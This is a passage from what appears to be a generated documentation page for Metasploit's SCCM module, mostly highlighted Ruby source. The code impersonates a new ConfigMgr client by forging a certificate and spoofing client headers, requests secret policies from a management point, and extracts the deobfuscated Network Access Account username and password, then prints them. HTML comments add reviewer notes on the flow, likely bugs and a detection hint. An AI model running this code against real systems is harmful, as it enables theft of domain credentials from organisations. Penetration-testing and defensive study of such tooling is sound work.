<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_extensions'>extensions</span> <span class='op'>=</span> <span class='lbracket'>[</span>
<span class='id identifier rubyid_ef'>ef</span><span class='period'>.</span><span class='id identifier rubyid_create_extension'>create_extension</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>keyUsage</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>digitalSignature,dataEncipherment</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='id identifier rubyid_ef'>ef</span><span class='period'>.</span><span class='id identifier rubyid_create_extension'>create_extension</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>extendedKeyUsage</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>1.3.6.1.4.1.311.101.2, 1.3.6.1.4.1.311.101</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='rbracket'>]</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_sign'>sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Digest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SHA256</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='lbracket'>[</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<!--
  Reviewer notes for get_creds_from_policy_doc(policy), based only on the listing below:
  * Parses `policy` with Nokogiri::XML and selects every `instance` element whose class
    attribute is CCM_NetworkAccessAccount.
  * For each instance it reads the NetworkAccessUsername and NetworkAccessPassword property
    values, passes each through deobfuscate_policy_value (defined outside this listing) and
    removes one trailing NUL ("\x00") with delete_suffix!.
  * Returns an array of [username, password] pairs. A pair is dropped only when BOTH values
    are blank; an entry with a single blank field is still returned.
  * The returned strings are the deobfuscated values, so callers should handle the result as
    secret material (the caller shown on this page prints and stores them).
  * NOTE(review): delete_suffix! mutates its receiver, so this presumably relies on
    deobfuscate_policy_value returning a non-nil, unfrozen String even for an empty or
    malformed value. Confirm against that helper.
-->
<h3 class="signature " id="get_creds_from_policy_doc-instance_method">
#<strong>get_creds_from_policy_doc</strong>(policy) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Extract obfuscated credentials from the resulting policy XML document</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 269</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_creds_from_policy_doc'>get_creds_from_policy_doc</span><span class='lparen'>(</span><span class='id identifier rubyid_policy'>policy</span><span class='rparen'>)</span>
<span class='id identifier rubyid_xml_doc'>xml_doc</span> <span class='op'>=</span> <span class='const'>Nokogiri</span><span class='op'>::</span><span class='const'>XML</span><span class='lparen'>(</span><span class='id identifier rubyid_policy'>policy</span><span class='rparen'>)</span>
<span class='id identifier rubyid_naa_sections'>naa_sections</span> <span class='op'>=</span> <span class='id identifier rubyid_xml_doc'>xml_doc</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>.//instance[@class=&#39;CCM_NetworkAccessAccount&#39;]</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_results'>results</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_naa_sections'>naa_sections</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_section'>section</span><span class='op'>|</span>
<span class='id identifier rubyid_username'>username</span> <span class='op'>=</span> <span class='id identifier rubyid_section'>section</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>property[@name=&#39;NetworkAccessUsername&#39;]/value</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_text'>text</span>
<span class='id identifier rubyid_username'>username</span> <span class='op'>=</span> <span class='id identifier rubyid_deobfuscate_policy_value'>deobfuscate_policy_value</span><span class='lparen'>(</span><span class='id identifier rubyid_username'>username</span><span class='rparen'>)</span>
<span class='id identifier rubyid_username'>username</span><span class='period'>.</span><span class='id identifier rubyid_delete_suffix!'>delete_suffix!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_password'>password</span> <span class='op'>=</span> <span class='id identifier rubyid_section'>section</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>property[@name=&#39;NetworkAccessPassword&#39;]/value</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_text'>text</span>
<span class='id identifier rubyid_password'>password</span> <span class='op'>=</span> <span class='id identifier rubyid_deobfuscate_policy_value'>deobfuscate_policy_value</span><span class='lparen'>(</span><span class='id identifier rubyid_password'>password</span><span class='rparen'>)</span>
<span class='id identifier rubyid_password'>password</span><span class='period'>.</span><span class='id identifier rubyid_delete_suffix!'>delete_suffix!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_username'>username</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_password'>password</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span>
<span class='comment'># Deleted credentials seem to result in just an empty value for username and password
</span> <span class='id identifier rubyid_results'>results</span><span class='period'>.</span><span class='id identifier rubyid_append'>append</span><span class='lparen'>(</span><span class='lbracket'>[</span><span class='id identifier rubyid_username'>username</span><span class='comma'>,</span> <span class='id identifier rubyid_password'>password</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_results'>results</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<!--
  Reviewer notes for get_naa_credentials(opts, management_point, site_code, computer_user),
  based only on the listing below (this method has no docstring in the generated page):
  * Sequence shown: generate_key_and_cert('ConfigMgr Client'), register_request,
    get_secret_policies polled through retry_until_truthy(timeout: 30), then request_policy
    and get_creds_from_policy_doc for every returned URL.
  * opts.merge gives the literal hash precedence, so any 'rhost', 'rport' or 'headers' entry
    supplied in opts is replaced; the port is fixed at 80 and the three headers are fixed
    literals.
  * Results are collected in a Set, so an identical [username, password] pair found in
    several policies is reported once.
  * Each pair is handed to report_creds and is also written in cleartext by print_good, so
    console output and anything that records it will contain the password.
  * Only SocketError is rescued; it is converted to Failure::Unreachable through fail_with.
  * NOTE(review): retry_until_truthy is defined elsewhere. If it can return nil once the
    timeout expires, secret_urls.each would raise NoMethodError, which this rescue does not
    cover. Confirm.
  * NOTE(review): for defenders, the header values here are constants chosen by the module
    and presumably resemble ordinary client traffic, so reviewing which hosts register as
    new clients is likely a better signal than the User-Agent alone. Verify in your
    environment.
-->
<h3 class="signature " id="get_naa_credentials-instance_method">
#<strong>get_naa_credentials</strong>(opts, management_point, site_code, computer_user) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 20</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_naa_credentials'>get_naa_credentials</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='comma'>,</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span> <span class='id identifier rubyid_site_code'>site_code</span><span class='comma'>,</span> <span class='id identifier rubyid_computer_user'>computer_user</span><span class='rparen'>)</span>
<span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span> <span class='op'>=</span> <span class='id identifier rubyid_generate_key_and_cert'>generate_key_and_cert</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ConfigMgr Client</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_http_opts'>http_opts</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>rhost</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>rport</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='int'>80</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>User-Agent</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ConfigMgr Messaging HTTP Sender</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Accept-Encoding</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>gzip, deflate</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Accept</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>*/*</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_ip_address'>ip_address</span> <span class='op'>=</span> <span class='id identifier rubyid_register_request'>register_request</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span><span class='comma'>,</span> <span class='id identifier rubyid_computer_user'>computer_user</span><span class='rparen'>)</span>
<span class='id identifier rubyid_secret_urls'>secret_urls</span> <span class='op'>=</span> <span class='id identifier rubyid_retry_until_truthy'>retry_until_truthy</span><span class='lparen'>(</span><span class='label'>timeout:</span> <span class='int'>30</span><span class='rparen'>)</span> <span class='lbrace'>{</span> <span class='id identifier rubyid_get_secret_policies'>get_secret_policies</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span> <span class='id identifier rubyid_site_code'>site_code</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span><span class='comma'>,</span> <span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_computer_user'>computer_user</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='id identifier rubyid_all_results'>all_results</span> <span class='op'>=</span> <span class='const'>Set</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_secret_urls'>secret_urls</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_url'>url</span><span class='op'>|</span>
<span class='id identifier rubyid_decrypted_policy'>decrypted_policy</span> <span class='op'>=</span> <span class='id identifier rubyid_request_policy'>request_policy</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_url'>url</span><span class='comma'>,</span> <span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='rparen'>)</span>
<span class='id identifier rubyid_results'>results</span> <span class='op'>=</span> <span class='id identifier rubyid_get_creds_from_policy_doc'>get_creds_from_policy_doc</span><span class='lparen'>(</span><span class='id identifier rubyid_decrypted_policy'>decrypted_policy</span><span class='rparen'>)</span>
<span class='id identifier rubyid_all_results'>all_results</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='id identifier rubyid_results'>results</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_all_results'>all_results</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>No NAA credentials configured</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_all_results'>all_results</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_username'>username</span><span class='comma'>,</span> <span class='id identifier rubyid_password'>password</span><span class='op'>|</span>
<span class='id identifier rubyid_report_creds'>report_creds</span><span class='lparen'>(</span><span class='id identifier rubyid_ip_address'>ip_address</span><span class='comma'>,</span> <span class='id identifier rubyid_username'>username</span><span class='comma'>,</span> <span class='id identifier rubyid_password'>password</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Found valid NAA credentials: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_password'>password</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>rescue</span> <span class='const'>SocketError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#Unreachable-constant" title="Msf::Module::Failure::Unreachable (constant)">Unreachable</a></span></span><span class='comma'>,</span> <span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_secret_policies-instance_method">
#<strong>get_secret_policies</strong>(http_opts, management_point, site_code, key, cert, sms_id, computer_user) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 54</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_secret_policies'>get_secret_policies</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span> <span class='id identifier rubyid_site_code'>site_code</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span><span class='comma'>,</span> <span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_computer_user'>computer_user</span><span class='rparen'>)</span>
<span class='id identifier rubyid_fqdn'>fqdn</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DOMAIN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_hex_pub_key'>hex_pub_key</span> <span class='op'>=</span> <span class='id identifier rubyid_make_ms_pubkey'>make_ms_pubkey</span><span class='lparen'>(</span><span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_public_key'>public_key</span><span class='rparen'>)</span>
<span class='id identifier rubyid_guid'>guid</span> <span class='op'>=</span> <span class='const'>SecureRandom</span><span class='period'>.</span><span class='id identifier rubyid_uuid'>uuid</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span>
<span class='id identifier rubyid_sent_time'>sent_time</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span><span class='period'>.</span><span class='id identifier rubyid_utc'>utc</span><span class='period'>.</span><span class='id identifier rubyid_iso8601'>iso8601</span>
<span class='id identifier rubyid_sccm_host'>sccm_host</span> <span class='op'>=</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='period'>.</span><span class='id identifier rubyid_downcase'>downcase</span>
<span class='id identifier rubyid_request_assignments'>request_assignments</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;RequestAssignments SchemaVersion=\&quot;1.00\&quot; ACK=\&quot;false\&quot; RequestType=\&quot;Always\&quot;&gt;&lt;Identification&gt;&lt;Machine&gt;&lt;ClientID&gt;GUID:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/ClientID&gt;&lt;FQDN&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fqdn'>fqdn</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/FQDN&gt;&lt;NetBIOSName&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/NetBIOSName&gt;&lt;SID /&gt;&lt;/Machine&gt;&lt;User /&gt;&lt;/Identification&gt;&lt;PolicySource&gt;SMS:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_site_code'>site_code</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/PolicySource&gt;&lt;Resource ResourceType=\&quot;Machine\&quot; /&gt;&lt;ServerCookie /&gt;&lt;/RequestAssignments&gt;\x00</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_request_assignments'>request_assignments</span><span class='period'>.</span><span class='id identifier rubyid_encode!'>encode!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_body_length'>body_length</span> <span class='op'>=</span> <span class='id identifier rubyid_request_assignments'>request_assignments</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span>
<span class='id identifier rubyid_request_assignments'>request_assignments</span> <span class='op'>=</span> <span class='id identifier rubyid_request_assignments'>request_assignments</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\r\n</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_compressed'>compressed</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_zlib_deflate'>zlib_deflate</span><span class='lparen'>(</span><span class='id identifier rubyid_request_assignments'>request_assignments</span><span class='rparen'>)</span>
<span class='id identifier rubyid_payload_signature'>payload_signature</span> <span class='op'>=</span> <span class='id identifier rubyid_rsa_sign'>rsa_sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_compressed'>compressed</span><span class='rparen'>)</span>
<span class='id identifier rubyid_client_id'>client_id</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>GUID:{</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span><span class='embexpr_end'>}</span><span class='tstring_content'>}\x00</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_client_ids_signature'>client_ids_signature</span> <span class='op'>=</span> <span class='id identifier rubyid_rsa_sign'>rsa_sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_client_id'>client_id</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_header'>header</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;Msg ReplyCompression=\&quot;zlib\&quot; SchemaVersion=\&quot;1.1\&quot;&gt;&lt;Body Type=\&quot;ByteRange\&quot; Length=\&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_body_length'>body_length</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot; Offset=\&quot;0\&quot; /&gt;&lt;CorrelationID&gt;{00000000-0000-0000-0000-000000000000}&lt;/CorrelationID&gt;&lt;Hooks&gt;&lt;Hook2 Name=\&quot;clientauth\&quot;&gt;&lt;Property Name=\&quot;AuthSenderMachine\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Property&gt;&lt;Property Name=\&quot;PublicKey\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hex_pub_key'>hex_pub_key</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Property&gt;&lt;Property Name=\&quot;ClientIDSignature\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_client_ids_signature'>client_ids_signature</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Property&gt;&lt;Property Name=\&quot;PayloadSignature\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_payload_signature'>payload_signature</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Property&gt;&lt;Property Name=\&quot;ClientCapabilities\&quot;&gt;NonSSL&lt;/Property&gt;&lt;Property Name=\&quot;HashAlgorithm\&quot;&gt;1.2.840.113549.1.1.11&lt;/Property&gt;&lt;/Hook2&gt;&lt;Hook3 Name=\&quot;zlib-compress\&quot; /&gt;&lt;/Hooks&gt;&lt;ID&gt;{</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_guid'>guid</span><span 
class='embexpr_end'>}</span><span class='tstring_content'>}&lt;/ID&gt;&lt;Payload Type=\&quot;inline\&quot; /&gt;&lt;Priority&gt;0&lt;/Priority&gt;&lt;Protocol&gt;http&lt;/Protocol&gt;&lt;ReplyMode&gt;Sync&lt;/ReplyMode&gt;&lt;ReplyTo&gt;direct:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>:SccmMessaging&lt;/ReplyTo&gt;&lt;SentTime&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sent_time'>sent_time</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SentTime&gt;&lt;SourceID&gt;GUID:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SourceID&gt;&lt;SourceHost&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SourceHost&gt;&lt;TargetAddress&gt;mp:MP_PolicyManager&lt;/TargetAddress&gt;&lt;TargetEndpoint&gt;MP_PolicyManager&lt;/TargetEndpoint&gt;&lt;TargetHost&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sccm_host'>sccm_host</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/TargetHost&gt;&lt;Timeout&gt;60000&lt;/Timeout&gt;&lt;/Msg&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_message'>message</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>MIME</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_bound'>bound</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>aAbBcCdDv1234567890VxXyYzZ</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_add_part'>add_part</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\ufeff</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_header'>header</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>text/plain; charset=UTF-16</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_add_part'>add_part</span><span class='lparen'>(</span><span class='id identifier rubyid_compressed'>compressed</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>application/octet-stream</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>binary</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='id identifier rubyid_http_opts'>http_opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/ccm_system/request</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
